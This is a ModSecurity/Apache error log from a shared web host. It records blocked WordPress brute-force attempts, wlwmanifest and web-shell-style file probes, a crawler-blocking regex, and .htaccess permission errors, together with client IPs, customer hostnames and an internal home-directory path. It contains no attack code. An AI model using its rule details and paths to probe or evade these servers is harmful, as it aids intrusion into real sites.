[Tue May 26 15:53:55.312273 2026] [security2:error] [pid 747840:tid 748085] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0uom6MwAuYuZKxvkArQAAAX0"]
[Tue May 26 15:53:57.329390 2026] [security2:error] [pid 747840:tid 747932] [remote 5.42.158.148:51682] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahV0vYm6MwAuYuZKxvkA0QABFls"]
[Tue May 26 15:53:57.577431 2026] [security2:error] [pid 747840:tid 748048] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0vYm6MwAuYuZKxvkA1AAAAVg"]
[Tue May 26 15:53:57.653326 2026] [security2:error] [pid 747840:tid 747927] [remote 109.205.180.55:58648] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.180.205.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahV0vYm6MwAuYuZKxvkA2AABG1Y"]
[Tue May 26 15:53:58.117876 2026] [security2:error] [pid 747840:tid 748074] [client 114.119.150.166:43473] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/beta/index.php"] [unique_id "ahV0vom6MwAuYuZKxvkA5wAAAXI"], referer: http://glorodavionics.com/beta/index.php?route=product/product&path=72_25_106&product_id=77
[Tue May 26 15:53:59.484126 2026] [security2:error] [pid 747840:tid 747984] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0v4m6MwAuYuZKxvkBAQAAARg"]
[Tue May 26 15:53:59.586125 2026] [security2:error] [pid 747840:tid 748068] [client 106.219.85.83:20629] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV0v4m6MwAuYuZKxvkBDAAAAWw"]
[Tue May 26 15:53:59.586325 2026] [security2:error] [pid 747840:tid 748068] [client 106.219.85.83:20629] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV0v4m6MwAuYuZKxvkBDAAAAWw"]
[Tue May 26 15:54:01.639840 2026] [security2:error] [pid 747840:tid 748001] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0wYm6MwAuYuZKxvkBLQAAASk"]
[Tue May 26 15:54:02.268691 2026] [security2:error] [pid 747840:tid 748091] [client 106.210.253.184:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0wYm6MwAuYuZKxvkBOAAAAYM"]
[Tue May 26 15:54:03.832770 2026] [security2:error] [pid 745492:tid 745627] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0w4mEQglTmoWcfxKIrgAAAIc"]
[Tue May 26 15:54:04.482210 2026] [security2:error] [pid 745492:tid 745745] [client 103.153.130.62:58413] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0xImEQglTmoWcfxKItgAAAP0"]
[Tue May 26 15:54:04.482330 2026] [security2:error] [pid 745492:tid 745745] [client 103.153.130.62:58413] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0xImEQglTmoWcfxKItgAAAP0"]
[Tue May 26 15:54:04.732466 2026] [security2:error] [pid 745492:tid 745645] [client 103.44.52.196:59628] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0xImEQglTmoWcfxKIugAAAJk"]
[Tue May 26 15:54:04.732598 2026] [security2:error] [pid 745492:tid 745645] [client 103.44.52.196:59628] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0xImEQglTmoWcfxKIugAAAJk"]
[Tue May 26 15:54:05.034322 2026] [security2:error] [pid 747840:tid 748083] [client 43.173.181.251:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahV0xIm6MwAuYuZKxvkBYwAAAXs"]
[Tue May 26 15:54:05.108057 2026] [security2:error] [pid 747840:tid 748074] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0xIm6MwAuYuZKxvkBbwAAAXI"]
[Tue May 26 15:54:06.680291 2026] [security2:error] [pid 747840:tid 748052] [client 2001:41d0:306:1b12:::0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahV0xom6MwAuYuZKxvkBiQABXG8"], referer: https://kingsclub.in/wp-login.php
[Tue May 26 15:54:07.773142 2026] [security2:error] [pid 747840:tid 747975] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0x4m6MwAuYuZKxvkBnQAAAQ8"]
[Tue May 26 15:54:09.327875 2026] [core:crit] [pid 747840:tid 748043] (13)Permission denied: [client 157.55.39.13:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:54:09.382034 2026] [security2:error] [pid 747840:tid 748032] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0yIm6MwAuYuZKxvkBwwAAAUg"]
[Tue May 26 15:54:09.828421 2026] [security2:error] [pid 747840:tid 748086] [client 85.208.96.207:28790] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-28-1/list/"] [unique_id "ahV0yYm6MwAuYuZKxvkB1QAAAX4"]
[Tue May 26 15:54:09.828549 2026] [security2:error] [pid 747840:tid 748086] [client 85.208.96.207:28790] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-28-1/list/"] [unique_id "ahV0yYm6MwAuYuZKxvkB1QAAAX4"]
[Tue May 26 15:54:10.092121 2026] [security2:error] [pid 745492:tid 745702] [client 106.219.85.83:32201] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV0yomEQglTmoWcfxKI7QAAANI"]
[Tue May 26 15:54:10.092206 2026] [security2:error] [pid 745492:tid 745702] [client 106.219.85.83:32201] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV0yomEQglTmoWcfxKI7QAAANI"]
[Tue May 26 15:54:10.477763 2026] [security2:error] [pid 747840:tid 747983] [client 143.110.243.118:52440] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/h0110w4y.php"] [unique_id "ahV0yom6MwAuYuZKxvkB4AAAARc"]
[Tue May 26 15:54:10.557908 2026] [security2:error] [pid 745492:tid 745718] [client 66.249.70.200:51627] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahV0yomEQglTmoWcfxKI8QAAAOI"]
[Tue May 26 15:54:11.648861 2026] [security2:error] [pid 747840:tid 748064] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0y4m6MwAuYuZKxvkB8QAAAWg"]
[Tue May 26 15:54:13.815310 2026] [security2:error] [pid 747840:tid 748048] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0zYm6MwAuYuZKxvkCFQAAAVg"]
[Tue May 26 15:54:14.846888 2026] [security2:error] [pid 747840:tid 748065] [client 103.153.130.62:58694] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0zom6MwAuYuZKxvkCLAAAAWk"]
[Tue May 26 15:54:14.847282 2026] [security2:error] [pid 747840:tid 748065] [client 103.153.130.62:58694] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0zom6MwAuYuZKxvkCLAAAAWk"]
[Tue May 26 15:54:15.529044 2026] [security2:error] [pid 747840:tid 747984] [client 103.44.52.196:60654] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0z4m6MwAuYuZKxvkCOwAAARg"]
[Tue May 26 15:54:15.529157 2026] [security2:error] [pid 747840:tid 747984] [client 103.44.52.196:60654] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0z4m6MwAuYuZKxvkCOwAAARg"]
[Tue May 26 15:54:15.996191 2026] [security2:error] [pid 747840:tid 748012] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0z4m6MwAuYuZKxvkCPAAAATQ"]
[Tue May 26 15:54:18.159911 2026] [security2:error] [pid 747840:tid 748091] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV00Ym6MwAuYuZKxvkCZAAAAYM"]
[Tue May 26 15:54:18.669400 2026] [security2:error] [pid 747840:tid 748097] [client 114.119.137.38:36023] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.thegoodsporting.com"] [uri "/volleyball.php"] [unique_id "ahV00om6MwAuYuZKxvkCegAAAYk"], referer: https://www.thegoodsporting.com/
[Tue May 26 15:54:18.882330 2026] [core:crit] [pid 747840:tid 748000] (13)Permission denied: [client 40.77.167.159:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:54:20.107011 2026] [security2:error] [pid 747840:tid 748067] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV004m6MwAuYuZKxvkChwAAAWs"]
[Tue May 26 15:54:20.855120 2026] [security2:error] [pid 747840:tid 748006] [client 106.219.85.83:15981] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV01Im6MwAuYuZKxvkClgAAAS4"]
[Tue May 26 15:54:20.855261 2026] [security2:error] [pid 747840:tid 748006] [client 106.219.85.83:15981] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV01Im6MwAuYuZKxvkClgAAAS4"]
[Tue May 26 15:54:21.922672 2026] [security2:error] [pid 747840:tid 748011] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV01Ym6MwAuYuZKxvkCoQAAATM"]
[Tue May 26 15:54:22.610338 2026] [security2:error] [pid 745492:tid 745672] [client 34.67.187.194:55246] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 194.187.67.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/xmlrpc.php"] [unique_id "ahV01omEQglTmoWcfxKJewAAALQ"]
[Tue May 26 15:54:22.722770 2026] [security2:error] [pid 747840:tid 747849] [remote 74.7.241.58:47692] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahV01om6MwAuYuZKxvkCuwABXQg"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/wp-admin/includes
[Tue May 26 15:54:22.860198 2026] [security2:error] [pid 747840:tid 748024] [client 34.67.187.194:64922] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "mexicoimportaciones.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahV01om6MwAuYuZKxvkCvgAAAUA"]
[Tue May 26 15:54:23.686337 2026] [security2:error] [pid 747840:tid 748022] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV014m6MwAuYuZKxvkCxgAAAT4"]
[Tue May 26 15:54:23.755641 2026] [security2:error] [pid 747840:tid 748062] [client 34.67.187.194:55638] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "mexicoimportaciones.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahV014m6MwAuYuZKxvkCzAAAAWY"]
[Tue May 26 15:54:23.772990 2026] [security2:error] [pid 747840:tid 747974] [client 143.110.243.118:48560] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/vesiw.php"] [unique_id "ahV014m6MwAuYuZKxvkCzQAAAQ4"]
[Tue May 26 15:54:24.068753 2026] [security2:error] [pid 747840:tid 748052] [client 34.67.187.194:50566] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "mexicoimportaciones.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahV02Im6MwAuYuZKxvkC1AAAAVw"]
[Tue May 26 15:54:24.445621 2026] [security2:error] [pid 747840:tid 747980] [client 34.67.187.194:64922] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "mexicoimportaciones.com"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahV02Im6MwAuYuZKxvkC2wAAARQ"]
[Tue May 26 15:54:24.794749 2026] [security2:error] [pid 747840:tid 748005] [client 34.67.187.194:53204] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "mexicoimportaciones.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahV02Im6MwAuYuZKxvkC3AAAAS0"]
[Tue May 26 15:54:25.169668 2026] [security2:error] [pid 745492:tid 745668] [client 34.67.187.194:55291] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "mexicoimportaciones.com"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahV02YmEQglTmoWcfxKJnQAAALA"]
[Tue May 26 15:54:25.374039 2026] [security2:error] [pid 745492:tid 745679] [client 103.153.130.62:58978] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV02YmEQglTmoWcfxKJngAAALs"]
[Tue May 26 15:54:25.374160 2026] [security2:error] [pid 745492:tid 745679] [client 103.153.130.62:58978] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV02YmEQglTmoWcfxKJngAAALs"]
[Tue May 26 15:54:25.514502 2026] [security2:error] [pid 747840:tid 748070] [client 34.67.187.194:50568] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "mexicoimportaciones.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahV02Ym6MwAuYuZKxvkC7wAAAW4"]
[Tue May 26 15:54:25.779039 2026] [security2:error] [pid 745492:tid 745741] [client 34.67.187.194:53814] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "mexicoimportaciones.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahV02YmEQglTmoWcfxKJowAAAPk"]
[Tue May 26 15:54:26.015431 2026] [security2:error] [pid 745492:tid 745646] [client 34.67.187.194:52194] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "mexicoimportaciones.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahV02omEQglTmoWcfxKJqgAAAJo"]
[Tue May 26 15:54:26.115690 2026] [security2:error] [pid 745492:tid 745681] [client 103.44.52.196:47974] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV02YmEQglTmoWcfxKJqQAAAL0"]
[Tue May 26 15:54:26.115829 2026] [security2:error] [pid 745492:tid 745681] [client 103.44.52.196:47974] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV02YmEQglTmoWcfxKJqQAAAL0"]
[Tue May 26 15:54:26.345317 2026] [security2:error] [pid 747840:tid 748069] [client 34.67.187.194:61173] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "mexicoimportaciones.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahV02om6MwAuYuZKxvkC8wAAAW0"]
[Tue May 26 15:54:26.464524 2026] [security2:error] [pid 745492:tid 745640] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV02omEQglTmoWcfxKJrQAAAJQ"]
[Tue May 26 15:54:27.405440 2026] [security2:error] [pid 747840:tid 748038] [client 223.123.35.44:36258] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV024m6MwAuYuZKxvkDAwAAAU4"]
[Tue May 26 15:54:27.405581 2026] [security2:error] [pid 747840:tid 748038] [client 223.123.35.44:36258] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV024m6MwAuYuZKxvkDAwAAAU4"]
[Tue May 26 15:54:28.144590 2026] [security2:error] [pid 747840:tid 748018] [client 85.198.104.203:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV024m6MwAuYuZKxvkDCgAAATo"]
[Tue May 26 15:54:28.461112 2026] [security2:error] [pid 747840:tid 748041] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV03Im6MwAuYuZKxvkDEgAAAVE"]
